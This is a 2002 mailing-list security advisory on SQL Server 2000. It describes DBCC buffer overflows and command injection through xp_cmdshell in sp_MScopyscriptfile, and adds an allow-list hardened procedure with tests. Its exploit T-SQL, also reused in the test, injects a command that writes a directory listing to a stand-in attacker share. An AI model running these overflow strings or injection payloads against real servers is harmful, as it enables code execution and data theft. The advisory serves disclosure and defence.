SQL Server 2000 Buffer Overflows and SQL Injection vulnerabilities

From: c c (cesarc56@UOL.COM.AR)
Date: 07/25/02


Date:         Thu, 25 Jul 2002 17:50:00 -0300
From: c c <cesarc56@UOL.COM.AR>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Security Advisory

Name: SQL Server 2000 Buffer Overflows and SQL Injection
vulnerabilities.
System Affected: SQL Server 2000, all Service Packs.
Severity: High.
Author: Cesar Cerrudo.
Date: 07/25/2002
Advisory Number: CC070205

Overview:
Database Consistency Checker (DBCC) statements are console commands
that perform maintenance and other operations on a SQL Server. Several
DBCC commands have unchecked buffers and can be overflowed with an
over-long string argument; successful exploitation lets an attacker
run code in the security context of the SQL Server service.
Several stored procedures used in database replication build an OS
command line from their parameters and hand it to xp_cmdshell without
validating them. Exploiting this "SQL injection" (strictly, OS command
injection through xp_cmdshell) lets an attacker run OS commands in the
context of the SQL Server Agent proxy account.

Details:

The following DBCC commands contain unchecked buffers; an over-long
string ('XXX...') in the indicated argument overflows them:

DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...')  (a)
DBCC INDEXFRAG ('','XXX...')                     (b)
DBCC UPDATEUSAGE ('','XXX...')                   (c)
DBCC CHECKCONSTRAINTS ('XXX...')                 (c)
DBCC SHOWCONTIG ('XXX...')                       (d)
DBCC CLEANTABLE ('','XXX...')                    (d)

(a) Only members of the sysadmin fixed server role can run this
    command.
(b) Only members of the sysadmin fixed server role or of the
    db_owner or db_ddladmin fixed database roles can run this command.
(c) Only members of the sysadmin fixed server role or of the
    db_owner fixed database role can run this command.
(d) Any user can run this command, so these two are reachable from
    any login that can connect to the server.

The buffer overflow in DBCC ADDEXTENDEDPROC affects SQL Server 7.0
too.

sp_MScopyscriptfile is one of several stored procedures (not listed
here for time reasons) vulnerable to SQL injection. It creates a
directory under the SQL Server replication directory and then copies a
script file into it. Its input parameter @scriptfile, the name of the
script file to be copied, is concatenated unchecked into a command
line that is passed to xp_cmdshell, so OS commands placed in that
parameter are executed.

---Code snip of the sp_MScopyscriptfile stored procedure where the
injection occurs---

select @cmd = N'copy "' + @scriptfile + N'" "' +
@directory + N'"'
exec @retcode = master..xp_cmdshell @cmd, NO_OUTPUT

----End code snip-----

When the caller is not a member of sysadmin, xp_cmdshell runs under
the SQL Server Agent proxy account, so that account must be enabled
for these injections to succeed; it is not enabled by default.

Exploit (the procedure concatenates @scriptfile into
  copy "<scriptfile>" "<directory>"
so the payload below closes the first quote, pipes into the attacker's
command, and leaves a dangling rd " to absorb the procedure's own
closing quotes; cmd.exe then receives
  copy "c:\autoexec.bat > nul" | dir c:\ > "\\attackerip\share\dir.txt" | rd "" "<directory>"
and, whatever the copy and rd stages do, the injected dir runs):

declare @command varchar(100)
declare @scriptfile varchar(200)
-- with this off, NULL + 'x' yields 'x' rather than NULL, so a NULL in
-- the procedure's own string building cannot blank out @cmd
set concat_null_yields_null off
-- the OS command the attacker wants run under the Agent proxy account
select @command='dir c:\ > "\\attackerip\share\dir.txt"'
-- closing quote, pipe, attacker command, pipe, and an opening quote
-- that the procedure's trailing '" "' + @directory + '"' will close
select @scriptfile='c:\autoexec.bat > nul" | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scriptfile, ''
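A hardened way to build the same command line, added here as an example; it is not code from the advisory or from Microsoft's sp_MScopyscriptfile, and the procedure name dbo.copy_scriptfile_safe, parameter sizes and error texts are assumptions. Both inputs are checked against a character allow-list before any string is built, so the quote-closing payload above is refused before xp_cmdshell is ever reached:

```sql
-- Added example, not code from the advisory or from Microsoft's
-- sp_MScopyscriptfile: a defensive version of its "copy the script file
-- into the replication directory" step. The procedure name, parameter
-- sizes and error texts are assumptions.
CREATE PROCEDURE dbo.copy_scriptfile_safe
    @scriptfile nvarchar(260),   -- path of the script file to copy
    @directory  nvarchar(260)    -- destination folder
AS
BEGIN
    SET NOCOUNT ON
    DECLARE @cmd nvarchar(1024), @retcode int

    -- 1. Allow-list both inputs before any string is built. Letters,
    --    digits, '_', '.', ':', '\' and space are all a Windows path needs
    --    here; everything cmd.exe interprets ('"', '|', '&', '<', '>', '^',
    --    '%') fails the pattern, and '..' blocks directory traversal.
    --    A NULL argument makes PATINDEX return NULL, so the IS NULL test
    --    catches it explicitly and the procedure fails closed.
    IF @scriptfile IS NULL OR LEN(@scriptfile) = 0
       OR PATINDEX(N'%[^A-Za-z0-9_.:\ ]%', @scriptfile) > 0
       OR CHARINDEX(N'..', @scriptfile) > 0
    BEGIN
        RAISERROR ('copy_scriptfile_safe: rejected script file name', 16, 1)
        RETURN 1
    END
    IF @directory IS NULL OR LEN(@directory) = 0
       OR PATINDEX(N'%[^A-Za-z0-9_.:\ ]%', @directory) > 0
       OR CHARINDEX(N'..', @directory) > 0
    BEGIN
        RAISERROR ('copy_scriptfile_safe: rejected directory name', 16, 1)
        RETURN 1
    END

    -- 2. Only now build the command line. With '"' excluded above, the
    --    quotes written here cannot be closed early by the caller, so a
    --    payload of the form  ...> nul" | <command> | rd "  can never
    --    become a second pipeline stage.
    SELECT @cmd = N'copy "' + @scriptfile + N'" "' + @directory + N'"'

    -- 3. Hand the validated command to xp_cmdshell, as the original does.
    EXEC @retcode = master..xp_cmdshell @cmd, NO_OUTPUT
    RETURN @retcode
END
GO

-- Constructed checks, to run on a test instance. The advisory's payload
-- is refused in step 1 (ad hoc RAISERROR, error 50000, return value 1)
-- before xp_cmdshell is reached; a plain path passes validation and
-- performs the copy, returning xp_cmdshell's own return code.
DECLARE @rc int
EXEC @rc = dbo.copy_scriptfile_safe
     N'c:\autoexec.bat > nul" | dir c:\ > "\\attackerip\share\dir.txt" | rd "',
     N'C:\Temp'
SELECT @rc AS payload_result
EXEC @rc = dbo.copy_scriptfile_safe N'C:\Scripts\snapshot.sql', N'C:\Temp'
SELECT @rc AS clean_result
```

The allow-list is deliberately narrow: a replication script path has no legitimate need for quotes, pipes or redirection, so rejecting the whole character class is simpler and safer than trying to escape it for cmd.exe. Independently of the patch, keeping the SQL Server Agent proxy account disabled and EXECUTE on xp_cmdshell restricted to sysadmin removes the OS-command sink that these injections rely on.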

More Details:
http://www.appsecinc.com/resources/alerts/mssql/02-0011.html

Vendor Status:
Microsoft was contacted, we worked together, and Microsoft released a
fix.

Patch Available:
http://www.microsoft.com/technet/security/bulletin/MS02-038.asp

Thanks!:
Special thanks to Aaron Newman (Application Security, Inc.) for his
collaboration in testing.
